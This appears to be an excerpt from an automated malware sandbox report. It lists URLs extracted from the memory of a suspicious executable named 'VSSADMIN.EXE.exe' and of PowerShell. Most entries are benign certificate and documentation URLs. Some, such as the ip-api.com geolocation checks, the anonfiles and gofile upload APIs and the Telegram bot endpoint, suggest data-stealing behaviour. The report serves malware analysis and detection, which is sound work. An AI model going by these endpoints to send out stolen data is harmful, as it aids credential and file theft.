              Source: VSSADMIN.EXE.exe, 00000001.00000003.244166649.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalT
              Source: VSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245055208.0000014C6D23B000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CCC8000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244150450.0000014C6D269000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.204299470.0000019668D80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.223682537.000001FBAB080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: VSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl;
              Source: powershell.exe, 00000025.00000002.224011476.000001FBAB187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187886205.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: VSSADMIN.EXE.exe, 00000001.00000003.190605654.0000014C6CBE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: powershell.exe, 00000025.00000002.213108359.000001FB90F99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
              Source: powershell.exe, 00000025.00000002.213108359.000001FB90F99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ctain
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244872297.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245055208.0000014C6D1B3000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244345388.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CCC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CBB0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244259837.0000014C6CFED000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244863597.0000014C6CFEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr
              Source: powershell.exe, 00000008.00000002.203170941.000001961006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA2F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187886205.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187886205.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000008.00000002.200799345.0000019600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB92EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D5F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192222187.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192742374.0000014C6D005000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245103939.0000014C6D29B000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192683834.0000014C6D29E000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192750598.0000014C6D280000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192683834.0000014C6D250000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244150450.0000014C6D29B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192222187.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244872297.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftDOWNLO~1JSOy.0
              Source: VSSADMIN.EXE.exe, 00000001.00000003.244345388.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftESSAG~1.JSOy.0
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192222187.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245250730.0000014C6D658000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blank-2MD3E.in
